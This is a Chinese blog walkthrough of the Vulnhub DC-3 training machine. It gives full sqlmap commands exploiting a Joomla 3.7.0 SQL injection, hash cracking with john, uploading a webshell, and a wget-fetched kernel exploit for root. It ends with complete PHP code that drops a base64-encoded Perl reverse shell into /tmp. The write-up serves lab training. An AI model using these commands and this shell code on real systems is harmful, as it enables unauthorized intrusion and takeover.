DC-3靶机

最新推荐文章于 2024-05-12 16:42:38 发布
最新推荐文章于 2024-05-12 16:42:38 发布
阅读量1.8k 收藏 1
点赞数 2
文章标签: php 安全 网络 web exp提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57954651/article/details/127085245
版权

题前环境 (kali dc-3靶机)

dc 1 2 不同  dc 3更改一些参数

 点击高级  修改对应的IDE

照旧 先进行信息收集

 这次多出来的主机是150   nmap端口扫描

 80端口可用  还将该端口的详细信息给出   并且cms用的是Joomla

尝试访问

 采用niko敏感目录扫描 (nikto -h 192.168.47.150)

发现后台登录地址

 用 joomscan扫描器扫一下 看看改版本有什么漏洞  (joomscan -u 192.168.47.150)

 发现joomla版本为3.7.0   再查找joomla 3.7.0存在的漏洞

 查看漏洞利用42033.txt文章   (//现在还不应该存在桌面上 后期拷贝的)

(cat usr/share/exploitdb/exploits/php/webapps/42033.txt)

 给出了sql注入点   开始利用

列出所有数据库  sqlmap -u "http://192.168.47.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 爆出五个数据库  观察到有一个joomla的数据库  来爆这个库

sqlmap -u "http://192.168.47.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D  "joomladb" --tables -p list[fullordering]

爆出了 #__users 表     一般 users 放的是用户名和加密后的密码  或是密码的hash值

那么我们来爆user表的列名

sqlmap -u "http://192.168.47.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D  joomladb -T “#__users”  --column -p list[fullordering]

 扫到了password 和 username 列        接着爆字段

sqlmap -u "http://192.168.47.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T “#__users” -C "username,password" --dump -p list[fullordering]

看到的结果 但是是以密文的形式  需要我们解密

在root文件夹下新建一个txt文件将password的字段复制进去

 john暴力破解该hash值

 得到登录后台账号密码(snoopy) 拿去登录

 浏览网页  发现存在文件上传点  漏洞点

 选择创建一个新文件  save保存

 将PHP反弹shell代码复制进去(需设置目标ip 和端口)

 保存就上传   然后进行测试访问 (再根据joomla的特性  模块会单独放在一个文件夹里/templates/  而beez3模块就在/templates/beez3/里面  刚才创建的webshell路径为 http://192.168.47.150/templates/beez3/shell.php)

开启nc   监听端口

反弹shell成功  

利用python获取交互shell  (python -c 'import pty; pty.spawn("/bin/bash")'

  交互shell获取成功  但还不是root权限  需要Linux提权

查看操作系统版本信息  寻找提权漏洞突破口  (tac /etc/issue)  (cat /proc/version)

得到操作系统与其版本

使用searchsploit工具搜索漏洞    打开另一个终端  (searchsploit Ubuntu 16.04)

 显示漏洞利用的完整路径  (searchsploit 39772.txt -p)

利用cp命令拷贝到桌面

打开39772文件

 文本写的是漏洞产生的原因   描述和漏洞利用的方法   还附上了exp   最后一行的连接 (https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip )自行下载

接着我们下载该压缩包并放到kali桌面里  解压该文件     将下载好的文件导入到DC-3靶机里

然后在桌面开启http服务   利用exp提权

 访问开启的http服务  exp地址如下图

 服务开启成功

回到我们的虚拟终端    利用wget命令下载该工具 (wget http://192.168.47.146:8888/exploit.tar  我这里将exploit.tar移到桌面了  正常应该再你下载的39772.zip的解压后的文件里 )

 下载完后用tar命令解压该压缩包  (tar -xvf exploit.tar)

  接着cd进入解压后的文件夹  ls查看里面的文件

 执行下两个文件  Linux系统下.(点)是执行某个文件的意思  (./compile.sh)

( ./doubleput)

 提权成功

flag在root目录底下  

小结:

A:  Joomlal漏洞
B:   niko敏感目录扫描
C:   joomscan
D:   sql

E:  john暴力破解
F:   文件上传漏洞
G:   python交互shell(python -c 'import pty; pty.spawn("/bin/bash")'
H:   searchsploit工具搜索漏洞
I:    利用exp提权
J:   PHP反弹shell

<?php
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
    }
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if(function_exists('exec')) {
            @exec($cfe,$res);
            $res = join("\n",$res);
            }
            elseif(function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
            } elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

:Carmelo Anthony
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机DC-3—WP
m0_66638011的博客
05-17 1209
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC-3靶机复现(过程详细,一看就会)
hqhhhh的博客
02-21 1503
这个DC-3的靶机主要是利用Joomla这个框架存在的sql注入漏洞拿到后台管理员的账户和密码,在后台管理的页面又发现一个可以执行php,我们就利用了反弹shell,但是在提权这里我们遇到一点问题,不是之前的suid或者sudo提权了,这里需要系统漏洞提权
最新看完这篇 教你玩转渗透测试靶机vulnhub——DC3_vulnhub dc3(2),2024年最新值得一读
最新发布
2401_84563354的博客
05-12 978
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。
DC-3 靶机详解
TonyChaoWei的博客
02-11 1064
DC-3靶机
DC-3渗透实战(详细过程)
tzyyyyyy的博客
10-16 2581
DC-3靶机渗透实战 利用各种姿势方法获取最终flag
DC系列-dc3靶机解析
qq_53309677的博客
12-16 414
-risk 测试的风险等级(0-3,默认为1);--level 测试的等级(1-5,默认为1);--random-agent 参数来随机的从./txt/user-agents.txt中获取 -dbs 列举数据库表 -p 可测试的参数;这时候可以进入漏洞可以发现sql注入的基本形式(很重要!-c 选择看的字段 --dump 转储DBMS数据库表项;进入数据库发现到了敏感的词user,尝试进入 user的表。--T 表示指定的表 --columns 列(字段)-D 表示数据库 --tables 中的表。
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 1988
DC-3靶机渗透测试详细教程
靶机4 DC-3(过程超详细)
honest_gg的博客
09-26 1022
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC -3靶机复盘
2301_79118231的博客
11-02 419
针对joomla开发的漏洞扫描器joomscan -u [要攻击的IP或URL]
Vulnhub靶机DC3
qq_48904485的博客
02-14 663
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC3(10.0.2.56)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/
DC靶机1-9
qq_60905276的博客
01-22 4660
1.DC1 首先我们不知道靶机的ip地址,我们通过
靶机DC-1 WP
m0_66638011的博客
05-11 1479
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1509
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2738
DC-2靶机渗透测试思路及流程
渗透DC-1靶机设计思路
05-24
3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值